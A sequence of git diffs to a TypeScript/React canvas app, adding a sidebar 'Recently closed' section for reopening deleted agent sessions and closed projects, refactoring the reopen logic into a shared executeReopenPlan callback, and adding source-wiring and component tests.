@@ -383,10 +383,10 @@ import { buildBackgroundLinkMaps, buildContextLinkNote, buildLinkMap, buildNoteP
 import { dependencyEdges, launchesToFire, unmetDeps, type ArmedNode } from '../lib/pendingLaunch'
 import { freeSpot } from '../lib/placement'
 import { pushSessionRename } from '../lib/sessionRename'
-import { useReopenHistory } from '../state/reopenHistory'
+import { useReopenHistory, type ReopenEntry } from '../state/reopenHistory'
 import { snapshotNode, recreateNodeFromSnapshot } from '../lib/reopenNode'
-import { buildClosedSessionEntries } from '../lib/closedHistory'
-import { planReopen } from '../lib/reopenPlan'
+import { buildClosedSessionEntries, stateToReopenSnapshot } from '../lib/closedHistory'
+import { planReopen, type ReopenPlan } from '../lib/reopenPlan'
 import { oneLine } from '@shared/one-line'
 import { parseLenses, verifyLensPrompt, verifySynthesisPrompt } from '../lib/verifyPanel'
 import { useSettings } from '../state/settings'
@@ -6195,40 +6195,13 @@ export function Canvas() {
     [commitActiveToStore, writeDisk]
   )
 
-  /** `app.reopenLastClosed` (Cmd+Shift+T): pops the shared close-history stack and reopens a
-   *  project tab or recreates a deleted node batch — whichever was closed more recently.
-   *  Skips stale entries (already reopened another way, or the project was permanently
-   *  deleted since) and keeps walking back until it finds a usable one or the stack empties.
-   *  The DECISION (which branch, staleness, active-vs-stored) is the pure `planReopen`
-   *  (`lib/reopenPlan.ts`, unit-tested there); this loop only pops the real stack and executes
-   *  whichever `ReopenPlan` comes back — the side-effecting parts that need live Canvas state. */
-  const reopenLastClosedCommand = useCallback((): boolean => {
-    for (;;) {
-      const entry = useReopenHistory.getState().popNext()
-      if (!entry) return false
-
-      const { projects, activeProjectId } = useProjects.getState()
-      const project = projects.find((p) => p.id === entry.projectId)
-      const accounts = useSettings.getState().settings.claudeAccounts
-      const plan = planReopen(
-        entry,
-        projects,
-        activeProjectId,
-        new Set(nodesRef.current.map((n) => n.id)),
-        (snap, liveIds) =>
-          recreateNodeFromSnapshot(snap, {
-            liveNodeIds: liveIds,
-            project,
-            resolveAccountId: (id) => resolveNewNodeAccount(id, project, accounts),
-            // The TARGET project's own permission mode, not the caller's active one — a node
-            // restored into project B must start under B's override, never A's.
-            permissionModeFor: (agentId) => projectPermissionMode(project, agentId)
-          })
-      )
-
+  /** Executes a `ReopenPlan` already decided by `planReopen` — the side-effecting half shared by
+   *  `Cmd+Shift+T` (`reopenLastClosedCommand`) and reopening a persisted closed-session entry
+   *  from the sidebar (`reopenClosedSessionCommand`). Returns whether it did anything ('skip'
+   *  plans are the caller's problem — this function never receives one). */
+  const executeReopenPlan = useCallback(
+    (plan: Exclude<ReopenPlan, { action: 'skip' }>): boolean => {
       switch (plan.action) {
-        case 'skip':
-          continue
         case 'reopenProject':
           // A project switch — commit the live canvas back to the store first, or whatever the
           // user was looking at is silently lost (the same invariant every other project switch/
@@ -6267,8 +6240,87 @@ export function Canvas() {
           }
           return true
       }
+    },
+    [switchProject, setNodes, markDirty, writeDisk, commitActiveToStore]
+  )
+
+  /** `app.reopenLastClosed` (Cmd+Shift+T): pops the shared close-history stack and reopens a
+   *  project tab or recreates a deleted node batch — whichever was closed more recently.
+   *  Skips stale entries (already reopened another way, or the project was permanently
+   *  deleted since) and keeps walking back until it finds a usable one or the stack empties.
+   *  The DECISION (which branch, staleness, active-vs-stored) is the pure `planReopen`
+   *  (`lib/reopenPlan.ts`, unit-tested there); this loop only pops the real stack and executes
+   *  whichever `ReopenPlan` comes back via `executeReopenPlan` — the side-effecting parts that
+   *  need live Canvas state. */
+  const reopenLastClosedCommand = useCallback((): boolean => {
+    for (;;) {
+      const entry = useReopenHistory.getState().popNext()
+      if (!entry) return false
+
+      const { projects, activeProjectId } = useProjects.getState()
+      const project = projects.find((p) => p.id === entry.projectId)
+      const accounts = useSettings.getState().settings.claudeAccounts
+      const plan = planReopen(
+        entry,
+        projects,
+        activeProjectId,
+        new Set(nodesRef.current.map((n) => n.id)),
+        (snap, liveIds) =>
+          recreateNodeFromSnapshot(snap, {
+            liveNodeIds: liveIds,
+            project,
+            resolveAccountId: (id) => resolveNewNodeAccount(id, project, accounts),
+            permissionModeFor: (agentId) => projectPermissionMode(project, agentId)
+          })
+      )
+
+      if (plan.action === 'skip') continue
+      return executeReopenPlan(plan)
     }
-  }, [switchProject, setNodes, markDirty, writeDisk, commitActiveToStore])
+  }, [executeReopenPlan])
+
+  /** Reopens ONE entry from a project's persisted `closedSessions` (the sidebar's "Recently
+   *  closed" section) — the browsable counterpart to `Cmd+Shift+T`. Consumes the entry
+   *  immediately so a stale double-click can't reopen it twice; if it turns out to recreate to
+   *  nothing (a kind this feature doesn't cover), the entry stays consumed rather than un-popped —
+   *  same "don't resurrect a stale entry" rule `planReopen` already applies to the in-memory
+   *  stack. Either way the consume already mutated `projectId`'s stored `closedSessions` — which
+   *  may not be the ACTIVE project, so nothing else here is guaranteed to flush it to disk. Force
+   *  an explicit save rather than relying on the active-canvas debounce (`markDirty`), which only
+   *  covers the active project. */
+  const reopenClosedSessionCommand = useCallback(
+    (projectId: string, entryId: string): boolean => {
+      const consumed = useProjects.getState().consumeClosedSession(projectId, entryId)
+      if (!consumed) return false
+      void writeDisk()
+
+      const { projects, activeProjectId } = useProjects.getState()
+      const project = projects.find((p) => p.id === projectId)
+      const accounts = useSettings.getState().settings.claudeAccounts
+      const syntheticEntry: ReopenEntry = {
+        kind: 'nodes',
+        projectId,
+        closedAt: consumed.closedAt,
+        nodes: [stateToReopenSnapshot(consumed)]
+      }
+      const plan = planReopen(
+        syntheticEntry,
+        projects,
+        activeProjectId,
+        new Set(nodesRef.current.map((n) => n.id)),
+        (snap, liveIds) =>
+          recreateNodeFromSnapshot(snap, {
+            liveNodeIds: liveIds,
+            project,
+            resolveAccountId: (id) => resolveNewNodeAccount(id, project, accounts),
+            permissionModeFor: (agentId) => projectPermissionMode(project, agentId)
+          })
+      )
+      if (plan.action === 'skip') return false
+      return executeReopenPlan(plan)
+    },
+    [executeReopenPlan, writeDisk]
+  )
 
   // ---- global shortcuts ----
   // The three trailing gestures below are registry-LESS chords (design D2: declared gestures,

--- a/src/renderer/canvas/Canvas.tsx
+++ b/src/renderer/canvas/Canvas.tsx
@@ -386,6 +386,7 @@ import { pushSessionRename } from '../lib/sessionRename'
 import { useReopenHistory, type ReopenEntry } from '../state/reopenHistory'
 import { snapshotNode, recreateNodeFromSnapshot } from '../lib/reopenNode'
 import { buildClosedSessionEntries, stateToReopenSnapshot } from '../lib/closedHistory'
+import { uuid } from '../lib/uuid'
 import { planReopen, type ReopenPlan } from '../lib/reopenPlan'
 import { oneLine } from '@shared/one-line'
 import { parseLenses, verifyLensPrompt, verifySynthesisPrompt } from '../lib/verifyPanel'
@@ -4574,12 +4575,12 @@ export function Canvas() {
           })
         }
         const deletedAt = Date.now()
-        const closedEntries = buildClosedSessionEntries(
-          set,
-          nodesRef.current,
-          deletedAt,
-          () => crypto.randomUUID()
-        )
+        // `uuid()`, NOT crypto.randomUUID: the latter exists only in a SECURE context, so it is
+        // undefined in the Server Edition served over plain HTTP on a LAN — and this call sits at
+        // the TOP of deleteNodes, before transport.destroy/setNodes, so a throw here would make
+        // Delete do nothing at all on that surface. See lib/uuid.ts (the same call already broke
+        // "Add agent" once).
+        const closedEntries = buildClosedSessionEntries(set, nodesRef.current, deletedAt, uuid)
         if (closedEntries.length) {
           useProjects.getState().recordClosedSessions(
             useProjects.getState().activeProjectId ?? '',

--- a/src/renderer/canvas/Canvas.tsx
+++ b/src/renderer/canvas/Canvas.tsx
@@ -385,6 +385,7 @@ import { freeSpot } from '../lib/placement'
 import { pushSessionRename } from '../lib/sessionRename'
 import { useReopenHistory } from '../state/reopenHistory'
 import { snapshotNode, recreateNodeFromSnapshot } from '../lib/reopenNode'
+import { buildClosedSessionEntries } from '../lib/closedHistory'
 import { planReopen } from '../lib/reopenPlan'
 import { oneLine } from '@shared/one-line'
 import { parseLenses, verifyLensPrompt, verifySynthesisPrompt } from '../lib/verifyPanel'
@@ -4571,6 +4572,19 @@ export function Canvas() {
             closedAt: Date.now(),
             nodes: snapshots
           })
+        }
+        const deletedAt = Date.now()
+        const closedEntries = buildClosedSessionEntries(
+          set,
+          nodesRef.current,
+          deletedAt,
+          () => crypto.randomUUID()
+        )
+        if (closedEntries.length) {
+          useProjects.getState().recordClosedSessions(
+            useProjects.getState().activeProjectId ?? '',
+            closedEntries
+          )
         }
       }
       nodesRef.current.forEach((n) => {

--- a/src/renderer/canvas/Canvas.tsx
+++ b/src/renderer/canvas/Canvas.tsx
@@ -11792,6 +11792,13 @@ export function Canvas() {
         onProjectContextMenu={onProjectContextMenu}
         onSwitchProject={switchProject}
         onAddToProject={addToProject}
+        onReopenProject={reopenProject}
+        onDeleteProject={requestDeleteClosed}
+        onReopenClosedSession={reopenClosedSessionCommand}
+        onDiscardClosedSession={(projectId, entryId) => {
+          useProjects.getState().discardClosedSession(projectId, entryId)
+          void writeDisk()
+        }}
         onMouseEnter={openSessionsPeek}
         onMouseLeave={closeSessionsPeekSoon}
       />

--- a/src/renderer/canvas/canvas-wiring.test.tsx
+++ b/src/renderer/canvas/canvas-wiring.test.tsx
@@ -183,10 +183,21 @@ describe('deleteNodes also records persisted closed-session history', () => {
   it('sits inside the same `opts?.record !== false` guard as the reopenHistory push', () => {
     // The bug this pins: recording closed-session history OUTSIDE the guard would enter it for
     // the account-removal cleanup delete too, which reopenHistory deliberately excludes.
-    const guardBlock = CANVAS_SRC.slice(
-      CANVAS_SRC.indexOf('if (opts?.record !== false) {'),
-      CANVAS_SRC.indexOf('if (opts?.record !== false) {') + 1500
-    )
+    // The guard block is extracted up to its ACTUAL matching closing brace (brace-depth
+    // counting) rather than a fixed-length slice, so this test would actually fail if a future
+    // edit moved the recording call to just past the guard's real end.
+    const guardStart = CANVAS_SRC.indexOf('if (opts?.record !== false) {')
+    const braceStart = CANVAS_SRC.indexOf('{', guardStart)
+    let depth = 0
+    let i = braceStart
+    for (; i < CANVAS_SRC.length; i++) {
+      if (CANVAS_SRC[i] === '{') depth++
+      else if (CANVAS_SRC[i] === '}') {
+        depth--
+        if (depth === 0) break
+      }
+    }
+    const guardBlock = CANVAS_SRC.slice(braceStart, i + 1)
     expect(guardBlock).toContain('useReopenHistory.getState().push(')
     expect(guardBlock).toContain('buildClosedSessionEntries(')
   })

--- a/src/renderer/canvas/canvas-wiring.test.tsx
+++ b/src/renderer/canvas/canvas-wiring.test.tsx
@@ -171,8 +171,19 @@ describe('breadcrumb wiring the CLAUDE.md bullet calls load-bearing', () => {
 describe('deleteNodes also records persisted closed-session history', () => {
   it('builds entries from the full pre-delete tree and the same "now"/ids used for reopenHistory', () => {
     expect(CANVAS_SRC).toContain('const deletedAt = Date.now()')
-    expect(CANVAS_SRC).toContain('buildClosedSessionEntries(')
-    expect(CANVAS_SRC).toContain('set,\n          nodesRef.current,\n          deletedAt,')
+    expect(CANVAS_SRC).toContain(
+      'buildClosedSessionEntries(set, nodesRef.current, deletedAt, uuid)'
+    )
+  })
+
+  it('mints entry ids with lib/uuid, never crypto.randomUUID', () => {
+    // crypto.randomUUID exists only in a SECURE context, so it is undefined in the Server Edition
+    // served over plain HTTP on a LAN. This call sits at the TOP of deleteNodes — before
+    // transport.destroy and setNodes — so a throw there makes Delete do nothing at all on that
+    // surface. The same call already broke "Add agent" once; see lib/uuid.ts.
+    // The CALL form, so the explanatory comment beside the fixed line can keep naming it.
+    expect(CANVAS_SRC).not.toContain('crypto.randomUUID(')
+    expect(CANVAS_SRC).toContain("import { uuid } from '../lib/uuid'")
   })
 
   it('records into the store only when entries were actually built', () => {

--- a/src/renderer/canvas/canvas-wiring.test.tsx
+++ b/src/renderer/canvas/canvas-wiring.test.tsx
@@ -203,6 +203,46 @@ describe('deleteNodes also records persisted closed-session history', () => {
   })
 })
 
+describe('reopening a persisted closed-session entry shares reopenLastClosed\'s execution', () => {
+  it('extracts the switch-on-plan-action body into its own callback', () => {
+    expect(CANVAS_SRC).toContain('const executeReopenPlan = useCallback(')
+    expect(CANVAS_SRC).toContain('(plan: Exclude<ReopenPlan, { action: \'skip\' }>): boolean => {')
+  })
+
+  it('reopenLastClosedCommand delegates to it instead of inlining the switch', () => {
+    const fnStart = CANVAS_SRC.indexOf('const reopenLastClosedCommand = useCallback(')
+    const fnBody = CANVAS_SRC.slice(fnStart, fnStart + 950)
+    expect(fnBody).toContain('return executeReopenPlan(plan)')
+    expect(fnBody).not.toContain('switch (plan.action)')
+  })
+
+  it('consumes the entry before doing anything else, so a stale double-click cannot reopen it twice', () => {
+    const fnStart = CANVAS_SRC.indexOf('const reopenClosedSessionCommand = useCallback(')
+    expect(fnStart).toBeGreaterThan(-1)
+    const fnBody = CANVAS_SRC.slice(fnStart, fnStart + 260)
+    expect(fnBody).toContain('.consumeClosedSession(projectId, entryId)')
+    expect(fnBody).toContain('if (!consumed) return false')
+    expect(fnBody).toContain('void writeDisk()')
+  })
+
+  it('wraps the consumed entry as a synthetic ReopenEntry and reuses the pure planReopen', () => {
+    const fnStart = CANVAS_SRC.indexOf('const reopenClosedSessionCommand = useCallback(')
+    const fnBody = CANVAS_SRC.slice(fnStart, fnStart + 1200)
+    expect(fnBody).toContain("kind: 'nodes'")
+    expect(fnBody).toContain('nodes: [stateToReopenSnapshot(consumed)]')
+    expect(fnBody).toContain('const plan = planReopen(')
+    expect(fnBody).toContain("if (plan.action === 'skip') return false")
+    expect(fnBody).toContain('return executeReopenPlan(plan)')
+  })
+
+  it('resolves permission mode and account against the TARGET project, same as reopenLastClosedCommand', () => {
+    const fnStart = CANVAS_SRC.indexOf('const reopenClosedSessionCommand = useCallback(')
+    const fnBody = CANVAS_SRC.slice(fnStart, fnStart + 1200)
+    expect(fnBody).toContain('resolveAccountId: (id) => resolveNewNodeAccount(id, project, accounts)')
+    expect(fnBody).toContain('permissionModeFor: (agentId) => projectPermissionMode(project, agentId)')
+  })
+})
+
 describe('reopen-last-closed records and dispatches through the shared history stack', () => {
   it('records a project close before hiding it', () => {
     expect(CANVAS_SRC).toContain('useReopenHistory.getState().push({ kind: \'project\'')

--- a/src/renderer/canvas/canvas-wiring.test.tsx
+++ b/src/renderer/canvas/canvas-wiring.test.tsx
@@ -168,6 +168,30 @@ describe('breadcrumb wiring the CLAUDE.md bullet calls load-bearing', () => {
   })
 })
 
+describe('deleteNodes also records persisted closed-session history', () => {
+  it('builds entries from the full pre-delete tree and the same "now"/ids used for reopenHistory', () => {
+    expect(CANVAS_SRC).toContain('const deletedAt = Date.now()')
+    expect(CANVAS_SRC).toContain('buildClosedSessionEntries(')
+    expect(CANVAS_SRC).toContain('set,\n          nodesRef.current,\n          deletedAt,')
+  })
+
+  it('records into the store only when entries were actually built', () => {
+    expect(CANVAS_SRC).toContain('if (closedEntries.length) {')
+    expect(CANVAS_SRC).toContain('.recordClosedSessions(')
+  })
+
+  it('sits inside the same `opts?.record !== false` guard as the reopenHistory push', () => {
+    // The bug this pins: recording closed-session history OUTSIDE the guard would enter it for
+    // the account-removal cleanup delete too, which reopenHistory deliberately excludes.
+    const guardBlock = CANVAS_SRC.slice(
+      CANVAS_SRC.indexOf('if (opts?.record !== false) {'),
+      CANVAS_SRC.indexOf('if (opts?.record !== false) {') + 1500
+    )
+    expect(guardBlock).toContain('useReopenHistory.getState().push(')
+    expect(guardBlock).toContain('buildClosedSessionEntries(')
+  })
+})
+
 describe('reopen-last-closed records and dispatches through the shared history stack', () => {
   it('records a project close before hiding it', () => {
     expect(CANVAS_SRC).toContain('useReopenHistory.getState().push({ kind: \'project\'')

--- a/src/renderer/canvas/canvas-wiring.test.tsx
+++ b/src/renderer/canvas/canvas-wiring.test.tsx
@@ -169,11 +169,14 @@ describe('breadcrumb wiring the CLAUDE.md bullet calls load-bearing', () => {
 })
 
 describe('deleteNodes also records persisted closed-session history', () => {
-  it('builds entries from the full pre-delete tree and the same "now"/ids used for reopenHistory', () => {
+  it('builds entries from the full pre-delete tree and the same "now" used for reopenHistory', () => {
     expect(CANVAS_SRC).toContain('const deletedAt = Date.now()')
     expect(CANVAS_SRC).toContain(
-      'buildClosedSessionEntries(set, nodesRef.current, deletedAt, uuid)'
+      'buildClosedSessionEntries(set, nodesRef.current, deletedAt, (nodeId) => {'
     )
+    // The reopenHistory push reuses the SAME `deletedAt`, not a second `Date.now()` call — the
+    // two ledgers must agree on when this batch closed, not just approximately.
+    expect(CANVAS_SRC).toContain('closedAt: deletedAt')
   })
 
   it('mints entry ids with lib/uuid, never crypto.randomUUID', () => {
@@ -184,6 +187,15 @@ describe('deleteNodes also records persisted closed-session history', () => {
     // The CALL form, so the explanatory comment beside the fixed line can keep naming it.
     expect(CANVAS_SRC).not.toContain('crypto.randomUUID(')
     expect(CANVAS_SRC).toContain("import { uuid } from '../lib/uuid'")
+  })
+
+  it('correlates each minted entry id back to its source node, so the two ledgers can consume each other', () => {
+    // The bug this pins: correlating the ⇧⌘T snapshot and its persisted twin by ARRAY POSITION
+    // (two independently-filtered lists happening to line up) instead of by node id would silently
+    // misalign the moment either filter changed.
+    expect(CANVAS_SRC).toContain('const closedSessionIdByNode = new Map<string, string>()')
+    expect(CANVAS_SRC).toContain('closedSessionIdByNode.set(nodeId, id)')
+    expect(CANVAS_SRC).toContain('closedSessionId: closedSessionIdByNode.get(n.id)')
   })
 
   it('records into the store only when entries were actually built', () => {
@@ -222,23 +234,39 @@ describe('reopening a persisted closed-session entry shares reopenLastClosed\'s 
 
   it('reopenLastClosedCommand delegates to it instead of inlining the switch', () => {
     const fnStart = CANVAS_SRC.indexOf('const reopenLastClosedCommand = useCallback(')
-    const fnBody = CANVAS_SRC.slice(fnStart, fnStart + 950)
+    const fnBody = CANVAS_SRC.slice(fnStart, fnStart + 1700)
     expect(fnBody).toContain('return executeReopenPlan(plan)')
     expect(fnBody).not.toContain('switch (plan.action)')
+  })
+
+  it('reopenLastClosedCommand discards the persisted twin of a popped node-batch entry', () => {
+    // The bug this pins: restoring via ⇧⌘T without consuming the matching sidebar row would let a
+    // later sidebar click restore the same closed session a second time.
+    const fnStart = CANVAS_SRC.indexOf('const reopenLastClosedCommand = useCallback(')
+    const fnBody = CANVAS_SRC.slice(fnStart, fnStart + 1700)
+    expect(fnBody).toContain("if (entry.kind === 'nodes') {")
+    expect(fnBody).toContain('.discardClosedSession(entry.projectId, n.closedSessionId)')
+    expect(fnBody).toContain('void writeDisk()')
   })
 
   it('consumes the entry before doing anything else, so a stale double-click cannot reopen it twice', () => {
     const fnStart = CANVAS_SRC.indexOf('const reopenClosedSessionCommand = useCallback(')
     expect(fnStart).toBeGreaterThan(-1)
-    const fnBody = CANVAS_SRC.slice(fnStart, fnStart + 260)
+    const fnBody = CANVAS_SRC.slice(fnStart, fnStart + 520)
     expect(fnBody).toContain('.consumeClosedSession(projectId, entryId)')
     expect(fnBody).toContain('if (!consumed) return false')
     expect(fnBody).toContain('void writeDisk()')
   })
 
+  it('drops the matching ⇧⌘T-stack entry so the two histories cannot both reopen the same delete', () => {
+    const fnStart = CANVAS_SRC.indexOf('const reopenClosedSessionCommand = useCallback(')
+    const fnBody = CANVAS_SRC.slice(fnStart, fnStart + 520)
+    expect(fnBody).toContain('useReopenHistory.getState().dropByClosedSessionId(projectId, entryId)')
+  })
+
   it('wraps the consumed entry as a synthetic ReopenEntry and reuses the pure planReopen', () => {
     const fnStart = CANVAS_SRC.indexOf('const reopenClosedSessionCommand = useCallback(')
-    const fnBody = CANVAS_SRC.slice(fnStart, fnStart + 1200)
+    const fnBody = CANVAS_SRC.slice(fnStart, fnStart + 1500)
     expect(fnBody).toContain("kind: 'nodes'")
     expect(fnBody).toContain('nodes: [stateToReopenSnapshot(consumed)]')
     expect(fnBody).toContain('const plan = planReopen(')
@@ -248,7 +276,7 @@ describe('reopening a persisted closed-session entry shares reopenLastClosed\'s 
 
   it('resolves permission mode and account against the TARGET project, same as reopenLastClosedCommand', () => {
     const fnStart = CANVAS_SRC.indexOf('const reopenClosedSessionCommand = useCallback(')
-    const fnBody = CANVAS_SRC.slice(fnStart, fnStart + 1200)
+    const fnBody = CANVAS_SRC.slice(fnStart, fnStart + 1500)
     expect(fnBody).toContain('resolveAccountId: (id) => resolveNewNodeAccount(id, project, accounts)')
     expect(fnBody).toContain('permissionModeFor: (agentId) => projectPermissionMode(project, agentId)')
   })

--- a/src/renderer/components/ClosedHistorySection.test.tsx
+++ b/src/renderer/components/ClosedHistorySection.test.tsx
@@ -1,0 +1,97 @@
+// @vitest-environment jsdom
+import { act } from 'react'
+import { createRoot, type Root } from 'react-dom/client'
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
+import { ClosedHistorySection } from './ClosedHistorySection'
+import type { Project } from '@shared/types'
+
+;(globalThis as { IS_REACT_ACT_ENVIRONMENT?: boolean }).IS_REACT_ACT_ENVIRONMENT = true
+
+const projects: Project[] = [
+  {
+    id: 'p1', name: 'closed-proj', color: '#fff', viewport: { x: 0, y: 0, zoom: 1 }, nodes: [],
+    closed: true, closedAt: 100
+  },
+  {
+    id: 'p2', name: 'open-proj', color: '#fff', viewport: { x: 0, y: 0, zoom: 1 }, nodes: [],
+    closedSessions: [{
+      id: 'e1', closedAt: 200,
+      node: { id: 'n1', kind: 'terminal', position: { x: 0, y: 0 }, size: { width: 1, height: 1 }, title: 'my shell', color: '#fff', group: null, cwd: '/tmp/x' },
+      absolutePosition: { x: 0, y: 0 }
+    }]
+  }
+]
+
+const noop = () => {}
+const baseProps = {
+  nowMs: 1000, collapsed: false, onToggleCollapse: noop,
+  onReopenProject: noop, onDeleteProject: noop, onReopenSession: noop, onDiscardSession: noop
+}
+
+describe('ClosedHistorySection', () => {
+  let root: Root
+  let host: HTMLElement
+
+  beforeEach(() => {
+    host = document.createElement('div')
+    document.body.appendChild(host)
+    root = createRoot(host)
+  })
+  afterEach(() => {
+    act(() => root.unmount())
+    host.remove()
+  })
+  const render = async (el: React.ReactElement): Promise<void> => {
+    await act(async () => root.render(el))
+  }
+
+  it('renders nothing when there is no history', async () => {
+    await render(
+      <ClosedHistorySection
+        {...baseProps}
+        projects={[{ id: 'p3', name: 'x', color: '#fff', viewport: { x: 0, y: 0, zoom: 1 }, nodes: [] }]}
+      />
+    )
+    expect(host.innerHTML).toBe('')
+  })
+
+  it('renders closed projects and closed sessions, one reopenable row each', async () => {
+    await render(<ClosedHistorySection {...baseProps} projects={projects} />)
+    const rows = host.querySelectorAll('.sessions-sidebar__history-item')
+    expect(rows).toHaveLength(2)
+    expect(host.textContent).toContain('my shell')
+    expect(host.textContent).toContain('closed-proj')
+  })
+
+  it('calls onReopenSession with projectId+entryId on click', async () => {
+    const onReopenSession = vi.fn()
+    await render(<ClosedHistorySection {...baseProps} projects={projects} onReopenSession={onReopenSession} />)
+    const sessionRow = Array.from(host.querySelectorAll('.sessions-sidebar__history-item'))
+      .find((el) => el.textContent?.includes('my shell'))
+    expect(sessionRow).toBeDefined()
+    await act(async () => sessionRow!.dispatchEvent(new MouseEvent('click', { bubbles: true })))
+    expect(onReopenSession).toHaveBeenCalledWith('p2', 'e1')
+  })
+
+  it('calls onDiscardSession from its × without also triggering reopen', async () => {
+    const onReopenSession = vi.fn()
+    const onDiscardSession = vi.fn()
+    await render(
+      <ClosedHistorySection
+        {...baseProps} projects={projects}
+        onReopenSession={onReopenSession} onDiscardSession={onDiscardSession}
+      />
+    )
+    const del = host.querySelector('.sessions-sidebar__history-del[aria-label="Discard"]') as HTMLElement
+    expect(del).toBeTruthy()
+    await act(async () => del.dispatchEvent(new MouseEvent('click', { bubbles: true })))
+    expect(onDiscardSession).toHaveBeenCalledWith('p2', 'e1')
+    expect(onReopenSession).not.toHaveBeenCalled()
+  })
+
+  it('collapsed hides the row list but keeps the header', async () => {
+    await render(<ClosedHistorySection {...baseProps} projects={projects} collapsed={true} />)
+    expect(host.textContent).toContain('Recently closed')
+    expect(host.textContent).not.toContain('my shell')
+  })
+})

--- a/src/renderer/components/ClosedHistorySection.test.tsx
+++ b/src/renderer/components/ClosedHistorySection.test.tsx
@@ -63,6 +63,16 @@ describe('ClosedHistorySection', () => {
     expect(host.textContent).toContain('closed-proj')
   })
 
+  it('renders a project row glyph with the sidebar\'s own monogram class', async () => {
+    // ProjectGlyph carries no box CSS of its own — "every wired call site passes its own
+    // className" — so without this the monogram fallback is a bare colored span, not the 18px
+    // circular badge every other project row in this sidebar shows.
+    await render(<ClosedHistorySection {...baseProps} projects={projects} />)
+    const projectRow = Array.from(host.querySelectorAll('.sessions-sidebar__history-item'))
+      .find((el) => el.textContent?.includes('closed-proj'))
+    expect(projectRow?.querySelector('.ss-group__monogram')).toBeTruthy()
+  })
+
   it('calls onReopenSession with projectId+entryId on click', async () => {
     const onReopenSession = vi.fn()
     await render(<ClosedHistorySection {...baseProps} projects={projects} onReopenSession={onReopenSession} />)

--- a/src/renderer/components/ClosedHistorySection.test.tsx
+++ b/src/renderer/components/ClosedHistorySection.test.tsx
@@ -89,6 +89,31 @@ describe('ClosedHistorySection', () => {
     expect(onReopenSession).not.toHaveBeenCalled()
   })
 
+  it('pressing Enter on the × keyboard-activates discard without also triggering reopen', async () => {
+    // A real browser synthesizes a `click` on a focused <button> when Enter/Space is pressed,
+    // AFTER the keydown has already bubbled (a keydown handler's stopPropagation cannot stop a
+    // separate click event from firing). jsdom's dispatchEvent does not synthesize that click for
+    // us, so both events are dispatched explicitly here to reproduce the real sequence: the
+    // keydown must not reach the row's onKeyDown (which would fire reopen), and the button's own
+    // onClick still fires discard as it always did for a mouse click.
+    const onReopenSession = vi.fn()
+    const onDiscardSession = vi.fn()
+    await render(
+      <ClosedHistorySection
+        {...baseProps} projects={projects}
+        onReopenSession={onReopenSession} onDiscardSession={onDiscardSession}
+      />
+    )
+    const del = host.querySelector('.sessions-sidebar__history-del[aria-label="Discard"]') as HTMLElement
+    expect(del).toBeTruthy()
+    await act(async () => {
+      del.dispatchEvent(new KeyboardEvent('keydown', { key: 'Enter', bubbles: true }))
+      del.dispatchEvent(new MouseEvent('click', { bubbles: true }))
+    })
+    expect(onDiscardSession).toHaveBeenCalledWith('p2', 'e1')
+    expect(onReopenSession).not.toHaveBeenCalled()
+  })
+
   it('collapsed hides the row list but keeps the header', async () => {
     await render(<ClosedHistorySection {...baseProps} projects={projects} collapsed={true} />)
     expect(host.textContent).toContain('Recently closed')

--- a/src/renderer/components/ClosedHistorySection.tsx
+++ b/src/renderer/components/ClosedHistorySection.tsx
@@ -1,0 +1,115 @@
+import type { Project } from '@shared/types'
+import { mergeClosedHistory } from '../lib/closedHistory'
+import { sessionStateAgeLabel } from '../lib/sessionList'
+import { ProjectGlyph } from './ProjectGlyph'
+
+export interface ClosedHistorySectionProps {
+  projects: readonly Project[]
+  nowMs: number
+  collapsed: boolean
+  onToggleCollapse(): void
+  onReopenProject(id: string): void
+  onDeleteProject(id: string): void
+  onReopenSession(projectId: string, entryId: string): void
+  onDiscardSession(projectId: string, entryId: string): void
+}
+
+/** Sidebar section listing recently closed projects (tabs) and recently closed sessions
+ *  (terminal/agent/… nodes deleted from a still-open project), merged by recency. Renders
+ *  nothing when there's no history at all — an empty "Recently closed" header would be dead
+ *  chrome on every fresh install. */
+export function ClosedHistorySection(props: ClosedHistorySectionProps): JSX.Element | null {
+  const rows = mergeClosedHistory(props.projects)
+  if (!rows.length) return null
+
+  return (
+    <div className="sessions-sidebar__history">
+      <div
+        className="sessions-sidebar__history-head"
+        role="button"
+        tabIndex={0}
+        onClick={props.onToggleCollapse}
+        onKeyDown={(e) => {
+          if (e.key === 'Enter' || e.key === ' ') props.onToggleCollapse()
+        }}
+      >
+        <span className="sessions-sidebar__chevron" aria-hidden="true">
+          {props.collapsed ? '▶' : '▼'}
+        </span>
+        <span className="sessions-sidebar__history-title">Recently closed</span>
+        <span className="sessions-sidebar__count">{rows.length}</span>
+      </div>
+      {!props.collapsed && (
+        <div className="sessions-sidebar__history-list">
+          {rows.map((row) =>
+            row.kind === 'project' ? (
+              <div
+                key={`project:${row.projectId}`}
+                className="sessions-sidebar__history-item"
+                role="button"
+                tabIndex={0}
+                title={row.project.cwd || row.project.name}
+                onClick={() => props.onReopenProject(row.projectId)}
+                onKeyDown={(e) => {
+                  if (e.key === 'Enter' || e.key === ' ') props.onReopenProject(row.projectId)
+                }}
+              >
+                <ProjectGlyph
+                  icon={row.project.icon}
+                  color={row.project.color}
+                  name={row.project.name}
+                  variant="monogram"
+                  size={15}
+                />
+                <span className="sessions-sidebar__history-name">{row.project.name}</span>
+                <span className="sessions-sidebar__history-age">
+                  {sessionStateAgeLabel(row.closedAt >= 0 ? row.closedAt : undefined, props.nowMs)}
+                </span>
+                <button
+                  className="sessions-sidebar__history-del"
+                  aria-label="Discard"
+                  title="Delete permanently (ends its sessions)"
+                  onClick={(e) => {
+                    e.stopPropagation()
+                    props.onDeleteProject(row.projectId)
+                  }}
+                >
+                  ×
+                </button>
+              </div>
+            ) : (
+              <div
+                key={`session:${row.entry.id}`}
+                className="sessions-sidebar__history-item"
+                role="button"
+                tabIndex={0}
+                title={row.entry.node.cwd || row.entry.node.title}
+                onClick={() => props.onReopenSession(row.projectId, row.entry.id)}
+                onKeyDown={(e) => {
+                  if (e.key === 'Enter' || e.key === ' ') props.onReopenSession(row.projectId, row.entry.id)
+                }}
+              >
+                <span className="sessions-sidebar__history-name">
+                  {row.entry.node.title || row.entry.node.kind}
+                </span>
+                <span className="sessions-sidebar__history-age">
+                  {sessionStateAgeLabel(row.closedAt, props.nowMs)}
+                </span>
+                <button
+                  className="sessions-sidebar__history-del"
+                  aria-label="Discard"
+                  onClick={(e) => {
+                    e.stopPropagation()
+                    props.onDiscardSession(row.projectId, row.entry.id)
+                  }}
+                >
+                  ×
+                </button>
+              </div>
+            )
